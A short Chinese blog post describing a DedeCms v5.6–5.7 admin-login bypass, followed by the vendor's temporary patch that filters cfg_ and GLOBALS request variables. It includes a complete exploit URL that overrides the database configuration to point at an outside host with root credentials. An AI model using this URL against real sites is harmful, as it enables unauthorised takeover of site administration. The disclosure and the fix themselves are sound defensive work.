php越权访问漏洞,织梦(DedeCms) v5.6-5.7 越权访问漏洞

该博客揭示了一个织梦网站后台的安全漏洞,攻击者只需修改特定验证码即可直接登录。官方建议临时解决方案是更新include/common.inc.php文件,通过新增函数CheckRequest来过滤非法请求变量,以增强系统安全性。
摘要由CSDN通过智能技术生成

http://www.XXXX.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate=dcug改为当前的验证码,即可直接进入网站后台

此漏洞的前提是必须得到后台路径才能实现

官方临时解决办法:

找到include/common.inc.php文件,把:

foreach($_REQUEST as $_k=>$_v)

{

var_dump($_k);

if( strlen($_k)>0 && preg_match(''#^(cfg_|GLOBALS)#'',$_k) )

{

exit(''Request var not allow!'');

}

}

换成:

//检查和注册外部提交的变量

function CheckRequest(&$val) {

if (is_array($val)) {

foreach ($val as $_k=>$_v) {

CheckRequest($_k);

CheckRequest($val[$_k]);

}

} else

{

if( strlen($val)>0 && preg_match(''#^(cfg_|GLOBALS)#'',$val) )

{

exit(''Request var not allow!'');

}

}

}

CheckRequest($_REQUEST);

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值